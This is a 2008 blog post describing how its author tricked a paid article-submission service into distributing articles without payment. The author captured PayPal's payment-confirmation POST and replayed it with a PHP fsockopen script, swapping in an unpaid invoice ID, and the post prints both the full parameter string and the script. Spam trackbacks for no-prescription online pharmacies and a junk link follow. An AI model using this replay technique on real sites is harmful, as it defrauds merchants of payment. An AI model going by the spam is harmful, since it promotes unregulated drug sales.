Re-use paid service

Published on July 27th, 2008

Programmers are lazy. Especially when it comes to protecting their program. Yesterday I came across a nice example of laziness.

Let’s say you buy an online service somewhere through paypal. Like for example a site which will submit your article to hundreds of other websites. But you have to pay each time you submit a new article.

How can you bypass this? Well first, you’ll have to pay for 1 article just to see how the system works and verifies purchases. So what I did was input my article in the form, pay with paypal and see how my article was being published on all the other websites.

In the background I had been logging all headers and responses with Live Http Headers. After I submitted the form, I was being redirected to a file called paypal.php which saves the article and redirects to paypal. In the post redirect to paypal the owner of the site naturally sends along an ID to the saved article so that when I paid it will know what my article is.

So I paid and was redirected to a page confirming my payment (/cgi-bin/paid.pl) with the following post parameters sent from paypal to the confirmation page:

txn_type=web_accept&payment_date=11%3A09%3A21+Jul+26%2C+2008+PDT&last_name=John&residence_country=US&item_name=Whatever&payment_gross=10.00&mc_currency=USD&business=&payment_type=instant&payer_status=verified&verify_sign=KiPd9Bdvkeyf7FQfdbScxo4dgo3pxccAEgZO5zWesa23-6fdf-cfsRndvPLzSvxc6Jds903dfDF&payer_email=&tax=0.00&txn_id=&first_name=&receiver_email=&quantity=1&payer_id=&invoice=[INVOICE ID]receiver_id=&item_number=&payment_status=Completed&mc_fee=1.17&payment_fee=1.17&shipping=0.00&mc_gross=10&custom=&charset=&notify_version=2.4&merchant_return_link=Click+Here+to+Continue

So naturally, I captured this and tried the following:

  1. $fp = fsockopen("www.target.com", 80, $errno, $errstr, 30);
  2. if (!$fp) {
  3. echo "$errstr ($errno)<br />\n";
  4. } else {
  5. $postdata = ‘txn_type=web_accept&payment_date=11%3A09%3A21+Jul+26%2C+2008+PDT&last_name=John&residence_country=US&item_name=Whatever&payment_gross=10.00&mc_currency=USD&business=&payment_type=instant&payer_status=verified&verify_sign=KiPd9Bdvkeyf7FQfdbScxo4dgo3pxccAEgZO5zWesa23-6fdf-cfsRndvPLzSvxc6Jds903dfDF&payer_email=&tax=0.00&txn_id=&first_name=&receiver_email=&quantity=1&payer_id=&invoice=[INVOICE ID]receiver_id=&item_number=&payment_status=Completed&mc_fee=1.17&payment_fee=1.17&shipping=0.00&mc_gross=10&custom=&charset=&notify_version=2.4&merchant_return_link=Click+Here+to+Continue’;
  6. $salida = "POST /cgi-bin/paid.pl HTTP/1.1\r\n";
  7. $salida.="Host: www.target.com\r\n";
  8. $salida.="Content-Type: application/x-www-form-urlencoded\r\n";
  9. $salida.="Content-Length: ".strlen($postdata)."\r\n";
  10. $salida.="Connection: close\r\n\r\n";
  11. $salida.=$postdata;
  12. fwrite($fp, $salida);
  13. while (!feof($fp)) {
  14. $d = fgets($fp);
  15. echo $d;
  16. }
  17. }
  18. fclose($fp);

Which the paid.pl gladly accepted and started with distributing my article.

So after that I tried inputting another article in the form, get redirected to paypal. I did not pay, but instead captured the Invoice ID and changed it in the postdata in the code below.

The mistake that paid.pl made was not using the paypal API to verify if the payment was in fact completed. Instead, it simply looked at one of the parameters, presumable payment_status and just assumed the payment was completed.

So modifying parameters and then sending them to a payment verification system might sometimes work if the programmer was too lazy to use the paypal API.

Ofcourse you could use FireFox’s Tamper data as well to do this kind of stuff.


There Are 4 Responses So Far. »

  1. Trackback by DANA on Friday June 25th, 2010:

    PillSpot.org. Canadian Health&Care.Special Internet Prices.No prescription online pharmacy.PillSpot.org. Herbal-supplements@buy.online” rel=”nofollow”>.…

    Categories: Mens Health.Stomach.Antibiotics.Vitamins/Herbal Supplements.Antidiabetic.Weight Loss.Anti-allergic/Asthma.Stop SmokingWomens Health.Antidepressants.Blood Pressure/Heart.Eye Care.Antiviral.Pain Relief.Anxiety/Sleep Aid.Mental HealthSkin…

  2. Trackback by JULIUS on Thursday July 15th, 2010:


    Pillspot.org. Canadian Health&Care.Best quality drugs.No prescription online pharmacy.Special Internet Prices. Low price pills. Buy pills online

    Buy:Viagra Professional.Cialis Soft Tabs.Viagra Super Force.Cialis Professional.Super Active ED Pack.Tramadol.Levitra.Zithromax.Cialis.Soma.Viagra Soft Tabs.Cialis Super Active+.Viagra.Maxaman.Viagra Super Active+.Propecia.VPXL….

  3. Trackback by DAVID on Wednesday July 21st, 2010:


    Medicamentspot.com. Canadian Health&Care.No prescription online pharmacy.Special Internet Prices.Best quality drugs. High quality drugs. Buy pills online

    Buy:Amoxicillin.Lipothin.SleepWell.Seroquel.Nymphomax.Cozaar.Female Pink Viagra.Benicar.Lipitor.Acomplia.Lasix.Advair.Zocor.Ventolin.Prozac.Zetia.Wellbutrin SR.Aricept.Buspar.Female Cialis….

  4. Trackback by File on Sunday August 29th, 2010:

    drive http://ehardoz3.AUTOTECHGUIDE.INFO/tag/File+Copy+drive/ : drive…

    drive…

Post a Comment